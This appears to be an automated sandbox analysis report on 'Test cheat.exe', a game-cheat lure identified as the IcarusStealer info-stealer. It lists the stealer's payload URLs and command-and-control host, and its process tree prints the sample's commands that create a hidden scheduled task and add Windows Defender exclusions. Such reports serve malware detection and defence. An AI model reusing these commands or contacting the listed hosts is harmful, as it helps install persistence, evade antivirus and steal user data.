Overview

overview

10

Static

static

3

Test cheat.exe

windows7-x64

7

Test cheat.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-03-2024 06:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Test cheat.exe

  • Size

    24.9MB

  • MD5

    4e1c29f0c1af62ddea916c6b80548c76

  • SHA1

    38d9f15356b6a65f4e76ee739867d55b01493793

  • SHA256

    13b863f0e32c4e25af5b2e323bddf6ea7f8fde1c3dc53bbc463d5a0e9c666882

  • SHA512

    f863e54437a36b53f91057f74bdbfcaed90c93256333afe978be5f7b73b417a74084d3a92afe4b6ceea96fd909997cf22b30612c43d6d0d27c64c0bba7db9c28

  • SSDEEP

    49152:lfRW10dDWeHzJhNF/CBpOqqUe00zCMe8KfFo:lfw1yaeHLNF/22UwCL8yF

Score
10/10
icarusstealerpersistencestealer

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

    stealericarusstealer
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 39 IoCs
  • Suspicious use of FindShellTrayWindow 51 IoCs
  • Suspicious use of SendNotifyMessage 23 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Test cheat.exe
    "C:\Users\Admin\AppData\Local\Temp\Test cheat.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3184
    • C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4916
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3968
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "$SXR" /tr '"C:\Windows\System32\CatRoot\$SXR\$SXR.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:3872
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6774.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4484
        • C:\Windows\SysWOW64\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:2820
        • C:\Windows\System32\CatRoot\$SXR\$SXR.exe
          "C:\Windows\System32\CatRoot\$SXR\$SXR.exe"
          4⤵
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of AdjustPrivilegeToken
          PID:4340
    • C:\Users\Admin\AppData\Local\Temp\switched.exe
      "C:\Users\Admin\AppData\Local\Temp\switched.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3212
      • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
        "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of WriteProcessMemory
        PID:3636
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4620
          • C:\Windows\system32\certutil.exe
            certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe" MD5
            5⤵
              PID:4948
            • C:\Windows\system32\find.exe
              find /i /v "md5"
              5⤵
                PID:556
              • C:\Windows\system32\find.exe
                find /i /v "certutil"
                5⤵
                  PID:1716
            • C:\Users\Admin\AppData\Local\Temp\tesetey.exe
              "C:\Users\Admin\AppData\Local\Temp\tesetey.exe"
              3⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3216
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mpkwo0xk\mpkwo0xk.cmdline"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3508
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5275.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8A43077877AC447E8DF444FB3249E46.TMP"
                  5⤵
                    PID:456
                • C:\Windows\explorer.exe
                  "C:\Windows\explorer.exe"
                  4⤵
                  • Modifies Installed Components in the registry
                  • Enumerates connected drives
                  • Checks SCSI registry key(s)
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1884
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 vUiuCXqqM
                  4⤵
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1720
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4668
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4308
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2244
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4968
          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
            1⤵
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:4812
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:2796
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:3600
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:1028
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:4428
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
            • Modifies Internet Explorer settings
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:1132
          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
            1⤵
              PID:4968

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
              Filesize

              2KB

              MD5

              3d086a433708053f9bf9523e1d87a4e8

              SHA1

              b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

              SHA256

              6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

              SHA512

              931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

              Download Submit

            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              Filesize

              16KB

              MD5

              aa5d4fef8290ad3008bae0709355652e

              SHA1

              1bd176e2ec08abd15464d3c27eeba0b2777da993

              SHA256

              b9572d7f5cd45f0903c757b6568c0535df34b4c8b3ff531a1a6996d3f033b865

              SHA512

              f327312b142a93d92a9a811208b77e761317104d1252b2c68ad966bdf87a3dd2efc1109ea5c4ca76ca793547b6300961c22ec1cfebf7f7b8f26ffdf4276f6f26

              Download Submit

            • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SETLANG_EXE_15
              Filesize

              36KB

              MD5

              0e2a09c8b94747fa78ec836b5711c0c0

              SHA1

              92495421ad887f27f53784c470884802797025ad

              SHA256

              0c1cdbbf6d974764aad46477863059eaec7b1717a7d26b025f0f8fe24338bb36

              SHA512

              61530a33a6109467962ba51371821ea55bb36cd2abc0e7a15f270abf62340e9166e66a1b10f4de9a306b368820802c4adb9653b9a5acd6f1e825e60128fd2409

              Download Submit

            • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel
              Filesize

              36KB

              MD5

              fb5f8866e1f4c9c1c7f4d377934ff4b2

              SHA1

              d0a329e387fb7bcba205364938417a67dbb4118a

              SHA256

              1649ec9493be27f76ae7304927d383f8a53dd3e41ea1678bacaff33120ea4170

              SHA512

              0fbe2843dfeab7373cde0643b20c073fdc2fcbefc5ae581fd1656c253dfa94e8bba4d348e95cc40d1e872456ecca894b462860aeac8b92cedb11a7cad634798c

              Download Submit

            • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133544378039599441.txt
              Filesize

              74KB

              MD5

              c09e63e4b960a163934b3c29f3bd2cc9

              SHA1

              d3a43b35c14ae2e353a1a15c518ab2595f6a0399

              SHA256

              308deca5e1ef4d875fbe0aff3ce4b0b575b28e643dffda819d4390ec77faf157

              SHA512

              5ca3321034dff47e3afe0b0bdfaffc08782991660910a29375a8e0363794b78247282aba65dbd882ae225aa140ae63927dfd0946a441ee6fa64a1d8c146777b9

              Download Submit

            • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\QDDM1QX5\microsoft.windows[1].xml
              Filesize

              96B

              MD5

              2415f1b0b1e5150e9f1e871081fd1fad

              SHA1

              a79e4bfddc3daf75f059fda3547bd18282d993f7

              SHA256

              3eff25035403aba506d0dbf69c76a22fa90ec66d2094cbf39bc5267a850902ae

              SHA512

              5d05da9ec1471dbf91f0c474c8db3897130543ff3c4da70724ce3a36adc38f628264c3dae4f54caef493f7593a0986a944dda0e19e947f3dfc34fc16fbd3e6bb

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Client.exe
              Filesize

              6.7MB

              MD5

              05d1e97dc498d38e1bba9dc8c897180e

              SHA1

              6c0bfbc0535a0965e418be21d2286b3b022fb4b6

              SHA256

              58104b87df4f81c949939b66e532da5baaf75fb26f1960bd40755411a8ecc269

              SHA512

              6ef86b1fac3d11c042e46107730b6d74a3ef8b0f25a3ec9a73c1e59e97a629f7a25568981e1a6210c9448824fd5f35936c57a9b14b6ea973f66696a153f61cb1

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Client.exe
              Filesize

              14.5MB

              MD5

              f741b8b94acc5b0efa7545b2947c2b63

              SHA1

              2eeb6aa78b8a7b95ab54a369a5c7554946d2c772

              SHA256

              8835d4401e46c7ef79f561fc6483d7d7bff005dbc20c09637891e5d409e7de07

              SHA512

              fed3df2f6915386f4866c6c6d7e841b7bf8f2e1ef709af70ac623de30321a7593bbb0def31e8e163faccfccb7fcc8a54013396fde232e46f430519b884199fea

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\Client.exe
              Filesize

              6.3MB

              MD5

              fff48155224ffb14715fa66575e89263

              SHA1

              52eef79f11d35370237aefe7a2541c601511223f

              SHA256

              78b662493b01b6afabc284e881f3545298dddf0139ad7e3c95e2c3b3b6ec0f2c

              SHA512

              0c99aac5a4c962aeee98c85bfd8a066dc6d59332f98e7335db773d43db84409e6c66c0f4b27501db51f18c8a7752fe09308fb8b8cea3a6a20dcc361ec0b9d0b0

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\RES5275.tmp
              Filesize

              1KB

              MD5

              5602eacaae3f4bfe9c1851f554106e6b

              SHA1

              183ca25b0529e2fcb9b004d209e4a7a14e1a0744

              SHA256

              b0ff21bb9f5de5964d9ca70f5da61ff243f38cf6b47c74257f0194558b585a49

              SHA512

              03515d034ba6897df74d72b4cae947648a05b92295347c53fa3e2faee218136c6e152a00eca9f564fe2357dbd71972a6190c0e6bcf65f7f73c81fb96abd5d235

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ndbewhwl.0t0.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe
              Filesize

              3.2MB

              MD5

              ceb8c3c0f2249f05f3df8f88d46ae743

              SHA1

              651675ba157c085ce64aa5bb2abbfd6f5efc75c6

              SHA256

              a047b5971bf32a48532d2dc9276f3f1208ebaa6ac2efe650bd827344fe86b778

              SHA512

              872d88e2306b40567ec28bb96875fa91a37425e36ad8264a20ba9a29c4552a090fd6336747e7f65056203ce29fedab600aa51684fa525c5417be484bc6b1766a

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\switched.exe
              Filesize

              3.7MB

              MD5

              b9bbe31d276de5c3d05352d070ae4244

              SHA1

              5e1bb67b01c579b4e0ad5a7475ceb657201c27ec

              SHA256

              a01977e758a85dc01fb8ca7da9110adfe5bf9b9bec0af1db82741fe83d20408d

              SHA512

              0a3459690bfdf8d238cb6f27c650903659c12aa589bcba037a45c68287342f53ca5c1e1b307a0abd8d481f79e3df6bd994cce6a79258343627aa7b3209b0ed17

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\tesetey.exe
              Filesize

              494KB

              MD5

              0f0838bc6642dd6bc603368e50b4aba3

              SHA1

              932bd4d1c11996bf8ac3ac74a94b266e96d44c36

              SHA256

              4acfa7fccfdd11c17fbb2e7a861683f749cbf6420f0d83d484a6024ff280a7a9

              SHA512

              a39605eaa160d4f918393c600d42873f2e6bfb54506edfbe590aac0f75d12b4aa66ff91192c0522c235695a9c6b95cd2dbe308b548b5f121ca6b6b7696029860

              Download Submit

            • C:\Users\Admin\AppData\Local\Temp\tmp6774.tmp.bat
              Filesize

              150B

              MD5

              77be3868de8f657d15c9ff6a161dab6c

              SHA1

              630d2e8bf3976dc6ea4a8b0bf38f2256af48cc33

              SHA256

              12199f00c8fadcadf0629c06599c700b2b9454013f2d7ecce6e7e35cd740914b

              SHA512

              552fb2c4d10905b01997e1505014681bb547ff231b117dbe16b209174fed942e6963989c5cfc72ac65cec7f9ab412a49075de94d81fa5961e08af2e3d0e38807

              Download Submit

            • C:\Windows\System32\CatRoot\$SXR\$SXR.exe
              Filesize

              3.4MB

              MD5

              036b625f1d42807a4a9a1b2f75ef3f6e

              SHA1

              9f4434a25d04c300b37ca9b4b23779525d0f83ec

              SHA256

              9d6b1275dc62c8a10943573ba5fdc89834c2092621e7ed457ac0a2b3f9681331

              SHA512

              51fcc86333e9aea8e585acc0cfb707a3b9813389289a6606b7ce6cd000ea33ddd897820b99603aa946787b8e524b36a2212307181bb38e0b0477bce81899bbc5

              Download Submit

            • C:\Windows\System32\CatRoot\$SXR\$SXR.exe
              Filesize

              3.2MB

              MD5

              9235fd32055faf5e74677f7c2665ac9a

              SHA1

              cd7f88d794b3d276fbd3e20d4c5d2a7b90ceb02e

              SHA256

              9a1efc87bff231b312b9883678509ddefd357ae3f4f97e996ed10e6158fe034d

              SHA512

              995e1aaf288c8d59991366b52ab67898c2fc9b1fcc5e3c944234d56943711de356c2028b26ca291ff5dabb82b92bc46012756fb717a22a8742757b11f9f6e711

              Download Submit

            • C:\Windows\System32\CatRoot\$SXR\Read.txt
              Filesize

              58B

              MD5

              79668a6729f0f219835c62c9e43b7927

              SHA1

              0cbbc7cc8dbd27923b18285960640f3dad96d146

              SHA256

              6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e

              SHA512

              bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\CSC8A43077877AC447E8DF444FB3249E46.TMP
              Filesize

              1KB

              MD5

              e9144225655a1177485a6238f397718e

              SHA1

              0618d989814312c38b8005fc469222f891470642

              SHA256

              f2ff3d3919bf3120bd18978b0225c56b53eec3a645493f7fe08344671cacb21d

              SHA512

              392b9684bc1c0d054a397bb8ed54bc682a59ea6c1c12abad5d70ec2f0065afec4645cae8c2672ec4571d5763397092388b944cd5c7582a4aa685ecd4e3a0c2a4

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\mpkwo0xk\mpkwo0xk.0.cs
              Filesize

              1KB

              MD5

              14846c9faaef9299a1bf17730f20e4e6

              SHA1

              8083da995cfaa0e8e469780e32fcff1747850eb6

              SHA256

              61bc7b23a430d724b310e374a67a60dd1e1f883c6dd3a98417c8579ba4973c1b

              SHA512

              549d99dbb7376d9d6106ad0219d6cf22eb70c80d54c9ad8c7d0b04a33d956515e55c9608ab6eec0733f2c23602867eb85b43e58200ded129958c7de7ed22efb1

              Download Submit

            • \??\c:\Users\Admin\AppData\Local\Temp\mpkwo0xk\mpkwo0xk.cmdline
              Filesize

              448B

              MD5

              f328fbfb2888758ad382778082413661

              SHA1

              4a84ad95af425856e08cb6e35a4119c634cb6a16

              SHA256

              4cf5ff55af348f5c753d19cc2d88473cc6bbc358db36d37d6339c98a5bcfe14b

              SHA512

              a08d4c8fe91df46b6eb5e7c5b25df5fc76f87de3b620f4152f7fe1f8e4eef0c9147a2d8a6af889e8eeeacbf9be5ce49b1b92b78ce865e8453dfeefdeb294f512

              Download Submit

            • memory/1028-229-0x0000023D889E0000-0x0000023D88A00000-memory.dmp

              Filesize

              128KB

              Download

            • memory/1028-227-0x0000023D88C20000-0x0000023D88C40000-memory.dmp

              Filesize

              128KB

              Download

            • memory/1028-218-0x00007FFEDFE80000-0x00007FFEE0021000-memory.dmp

              Filesize

              1.6MB

              Download

            • memory/1028-231-0x0000023D88FF0000-0x0000023D89010000-memory.dmp

              Filesize

              128KB

              Download

            • memory/1132-274-0x00000255548C0000-0x00000255548E0000-memory.dmp

              Filesize

              128KB

              Download

            • memory/1132-271-0x00000255541B0000-0x00000255541D0000-memory.dmp

              Filesize

              128KB

              Download

            • memory/1132-269-0x0000025554500000-0x0000025554520000-memory.dmp

              Filesize

              128KB

              Download

            • memory/1720-60-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/1720-61-0x0000000005570000-0x0000000005580000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1720-59-0x0000000000400000-0x0000000000424000-memory.dmp

              Filesize

              144KB

              Download

            • memory/1720-185-0x0000000005570000-0x0000000005580000-memory.dmp

              Filesize

              64KB

              Download

            • memory/1720-134-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/1884-156-0x0000000003430000-0x0000000003431000-memory.dmp

              Filesize

              4KB

              Download

            • memory/2796-166-0x0000016CB3C80000-0x0000016CB3CA0000-memory.dmp

              Filesize

              128KB

              Download

            • memory/2796-164-0x0000016CB35E0000-0x0000016CB3600000-memory.dmp

              Filesize

              128KB

              Download

            • memory/2796-162-0x0000016CB3820000-0x0000016CB3840000-memory.dmp

              Filesize

              128KB

              Download

            • memory/3216-44-0x0000000005410000-0x00000000054A2000-memory.dmp

              Filesize

              584KB

              Download

            • memory/3216-63-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/3216-46-0x0000000006FA0000-0x0000000007544000-memory.dmp

              Filesize

              5.6MB

              Download

            • memory/3216-45-0x00000000055D0000-0x00000000055E0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/3216-43-0x0000000005370000-0x000000000540C000-memory.dmp

              Filesize

              624KB

              Download

            • memory/3216-42-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/3216-41-0x0000000000A80000-0x0000000000B02000-memory.dmp

              Filesize

              520KB

              Download

            • memory/3600-203-0x000001EDFF190000-0x000001EDFF1B0000-memory.dmp

              Filesize

              128KB

              Download

            • memory/3600-205-0x000001EDFF150000-0x000001EDFF170000-memory.dmp

              Filesize

              128KB

              Download

            • memory/3600-208-0x000001EDFF760000-0x000001EDFF780000-memory.dmp

              Filesize

              128KB

              Download

            • memory/3636-109-0x00007FF766CB0000-0x00007FF7670EC000-memory.dmp

              Filesize

              4.2MB

              Download

            • memory/3636-38-0x00007FF766CB0000-0x00007FF7670EC000-memory.dmp

              Filesize

              4.2MB

              Download

            • memory/4308-65-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4308-70-0x0000000005300000-0x0000000005322000-memory.dmp

              Filesize

              136KB

              Download

            • memory/4308-64-0x0000000004480000-0x00000000044B6000-memory.dmp

              Filesize

              216KB

              Download

            • memory/4308-66-0x0000000004590000-0x00000000045A0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4308-68-0x0000000004BD0000-0x00000000051F8000-memory.dmp

              Filesize

              6.2MB

              Download

            • memory/4308-67-0x0000000004590000-0x00000000045A0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4308-139-0x00000000073F0000-0x0000000007A6A000-memory.dmp

              Filesize

              6.5MB

              Download

            • memory/4308-140-0x0000000006D70000-0x0000000006D8A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/4308-86-0x0000000005510000-0x0000000005576000-memory.dmp

              Filesize

              408KB

              Download

            • memory/4308-76-0x00000000053A0000-0x0000000005406000-memory.dmp

              Filesize

              408KB

              Download

            • memory/4308-143-0x0000000006F60000-0x0000000006F71000-memory.dmp

              Filesize

              68KB

              Download

            • memory/4308-87-0x0000000005580000-0x00000000058D4000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/4308-97-0x0000000005A30000-0x0000000005A4E000-memory.dmp

              Filesize

              120KB

              Download

            • memory/4308-98-0x0000000005D70000-0x0000000005DBC000-memory.dmp

              Filesize

              304KB

              Download

            • memory/4308-147-0x0000000007080000-0x0000000007088000-memory.dmp

              Filesize

              32KB

              Download

            • memory/4308-103-0x000000006FC80000-0x000000006FCCC000-memory.dmp

              Filesize

              304KB

              Download

            • memory/4308-117-0x0000000006AC0000-0x0000000006B63000-memory.dmp

              Filesize

              652KB

              Download

            • memory/4308-115-0x0000000004590000-0x00000000045A0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4308-155-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4308-114-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

              Filesize

              120KB

              Download

            • memory/4308-100-0x0000000006010000-0x0000000006042000-memory.dmp

              Filesize

              200KB

              Download

            • memory/4308-102-0x000000007F760000-0x000000007F770000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4340-179-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4340-280-0x0000000005BC0000-0x0000000005BD0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4340-279-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4428-250-0x0000011B4E030000-0x0000011B4E050000-memory.dmp

              Filesize

              128KB

              Download

            • memory/4428-252-0x0000011B4E440000-0x0000011B4E460000-memory.dmp

              Filesize

              128KB

              Download

            • memory/4428-248-0x0000011B4E070000-0x0000011B4E090000-memory.dmp

              Filesize

              128KB

              Download

            • memory/4916-135-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4916-20-0x0000000000320000-0x0000000000960000-memory.dmp

              Filesize

              6.2MB

              Download

            • memory/4916-99-0x0000000005290000-0x00000000052B2000-memory.dmp

              Filesize

              136KB

              Download

            • memory/4916-21-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4916-101-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4916-69-0x0000000005410000-0x0000000005420000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4968-144-0x0000000007150000-0x000000000715E000-memory.dmp

              Filesize

              56KB

              Download

            • memory/4968-118-0x000000007F2A0000-0x000000007F2B0000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4968-73-0x0000000073920000-0x00000000740D0000-memory.dmp

              Filesize

              7.7MB

              Download

            • memory/4968-74-0x0000000002350000-0x0000000002360000-memory.dmp

              Filesize

              64KB

              Download

            • memory/4968-141-0x0000000006FA0000-0x0000000006FAA000-memory.dmp

              Filesize

              40KB

              Download

            • memory/4968-142-0x0000000007190000-0x0000000007226000-memory.dmp

              Filesize

              600KB

              Download

            • memory/4968-136-0x0000000002350000-0x0000000002360000-memory.dmp

              Filesize

              64KB

              Download

